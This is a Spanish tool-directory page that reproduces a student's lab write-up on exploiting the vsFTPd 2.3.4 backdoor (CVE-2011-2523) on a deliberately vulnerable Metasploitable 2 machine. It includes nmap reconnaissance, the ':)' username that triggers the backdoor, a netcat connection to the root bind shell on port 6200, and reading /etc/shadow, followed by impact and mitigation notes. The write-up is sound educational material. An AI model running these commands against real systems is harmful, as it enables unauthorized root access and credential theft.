Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
metasploitable2-vsftpd-exploitation — Proyecto: explotación de puerta trasera de vsFTPd 2.3.4 (CVE-2011-2523) en Metasploitable 2 | Kitploit
Herramientas/GitHubGitHub/rinaliyeva/metasploitable2-vsftpd-exploitation
Descifrado de ContraseñasEscalada de PrivilegiosReconocimientoMapeo de RedesEscaneo de PuertosAnálisis de VulnerabilidadesExplotaciónPost-ExplotaciónPruebas de Penetración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Aprendizaje y Educación
GitHubrinaliyeva/metasploitable2-vsftpd-exploitation

metasploitable2-vsftpd-exploitation

Proyecto: explotación de puerta trasera de vsFTPd 2.3.4 (CVE-2011-2523) en Metasploitable 2

Ver Repositorio
5hace 4 mesesAún no revisado

Metasploitable 2 - Laboratorio de Explotación de vsFTPd 2.3.4

Resumen

Este proyecto demuestra un flujo de trabajo de pruebas de penetración contra una máquina deliberadamente vulnerable, Metasploitable 2. El objetivo fue identificar, explotar y analizar una vulnerabilidad conocida en el servicio FTP, logrando finalmente acceso a nivel root y evaluando el impacto en la seguridad.


Configuración del laboratorio

  • Máquina atacante: Ubuntu (Máquina virtual)
  • Máquina objetivo: Metasploitable 2 (Máquina virtual)
  • Configuración de red: Red solo anfitrión (192.168.56.0/24)

Verificación del objetivo

Se verificó el sistema objetivo y su configuración de red:

root@kitploit:~
whoami
hostname
ifconfig

Verificación de configuración del objetivo


Verificación de conectividad

Se confirmó la conectividad de red entre atacante y objetivo:

root@kitploit:~
ping 192.168.56.101

Verificación de conectividad con ping


Objetivos

  • Realizar reconocimiento de red
  • Identificar servicios expuestos
  • Detectar software vulnerable
  • Explotar una vulnerabilidad de puerta trasera conocida
  • Obtener acceso root
  • Realizar análisis posterior a la explotación

Herramientas utilizadas

  • Nmap
  • Telnet
  • Netcat
  • Linux (Máquina virtual Ubuntu)

Resumen del flujo de ataque

  1. Se verificó la configuración y conectividad del objetivo
  2. Se descubrió el host objetivo en la red local
  3. Se identificaron puertos abiertos y servicios expuestos
  4. Se detectó el servicio FTP vulnerable (vsFTPd 2.3.4)
  5. Se activó la puerta trasera mediante un inicio de sesión FTP manipulado
  6. Se obtuvo acceso root a través de una shell vinculada
  7. Se realizó enumeración posterior a la explotación

Reconocimiento

Se realizó descubrimiento de hosts:

root@kitploit:~
nmap -sn 192.168.56.0/24

Se identificaron hosts activos en la red.

Escaneo de descubrimiento de hosts


Escaneo de puertos

root@kitploit:~
nmap 192.168.56.101

Se descubrieron múltiples puertos abiertos, incluyendo:

  • 21 (FTP)
  • 22 (SSH)
  • 23 (Telnet)
  • 80 (HTTP)
  • 445 (SMB)

Resultados del escaneo de puertos


Enumeración de servicios

root@kitploit:~
nmap -sV 192.168.56.101

Se identificó el servicio FTP en ejecución:

root@kitploit:~
vsFTPd 2.3.4

Un escaneo completo de servicios y basado en scripts se incluye en los archivos de soporte: Salida del escaneo Nmap.

Enumeración de servicios


Identificación de vulnerabilidad

El servicio FTP estaba ejecutando una versión vulnerable conocida:

vsFTPd 2.3.4

Esta versión de vsFTPd fue distribuida con una puerta trasera maliciosa que se activa cuando se utiliza un nombre de usuario que contiene :) durante la autenticación. Al activarse, el servicio abre una shell vinculada en el puerto 6200, permitiendo acceso remoto no autorizado.


Explotación (Manual)

Se activó la puerta trasera usando Telnet:

root@kitploit:~
telnet 192.168.56.101 21
root@kitploit:~
USER test:)
PASS test

Activación de puerta trasera mediante Telnet


Acceso a la shell

Se conectó a la puerta trasera usando Netcat:

root@kitploit:~
nc 192.168.56.101 6200

Conexión de shell vinculada


Resultado

root@kitploit:~
whoami
root@kitploit:~
root

Acceso root obtenido exitosamente

Prueba de acceso root


Post-explotación

Después de obtener acceso root, se realizó una enumeración básica del sistema:

root@kitploit:~
cat /etc/passwd
cat /etc/shadow
  • Se enumeraron usuarios del sistema y cuentas de servicio
  • Se recuperaron credenciales hash de /etc/shadow
  • Se demostró acceso a archivos sensibles del sistema

Enumeración de usuarios

Acceso al archivo shadow


Impacto

  • Compromiso total del sistema (acceso a nivel root)
  • Capacidad de ejecutar comandos arbitrarios
  • Exposición de datos de credenciales sensibles
  • Potencial para movimiento lateral dentro de una red

Mitigación

  • Eliminar o deshabilitar el servicio FTP si no es necesario
  • Actualizar el software vulnerable a versiones seguras
  • Reemplazar protocolos inseguros (como FTP sin cifrar) con alternativas seguras (SFTP)
  • Restringir el acceso a servicios críticos mediante reglas de firewall
  • Implementar registro y monitoreo
  • Aplicar políticas de autenticación sólidas

Archivos de soporte

  • Salida del escaneo Nmap

Conclusión clave

Este laboratorio demuestra cómo un solo servicio vulnerable puede llevar a un compromiso total del sistema. Destaca la importancia de una configuración adecuada de servicios, la gestión de parches y minimizar las superficies de ataque expuestas.

Lo que aprendí

Esta fue mi primera vez explotando manualmente una puerta trasera del mundo real. Aprendí cómo una sola cadena de nombre de usuario maliciosa (:)) puede desencadenar acceso a nivel root, lo que reforzó por qué la enumeración de servicios y la detección de versiones son tan importantes en el reconocimiento. También me familiaricé más con comandos básicos de post-explotación en Linux, como leer /etc/shadow y entender cómo se ven realmente las credenciales hash.

Limitaciones

Este fue un entorno de laboratorio controlado utilizando Metasploitable 2, una máquina intencionalmente vulnerable. La puerta trasera de vsFTPd 2.3.4 es un CVE conocido (CVE-2011-2523) de 2011, por lo que esto no refleja un compromiso moderno del mundo real. En una evaluación real, se necesitarían pasos adicionales como evasión, omisión de registros o pivoteo. Este proyecto se centró en comprender los mecanismos básicos de explotación, no en una prueba de penetración completa.

Descargar herramienta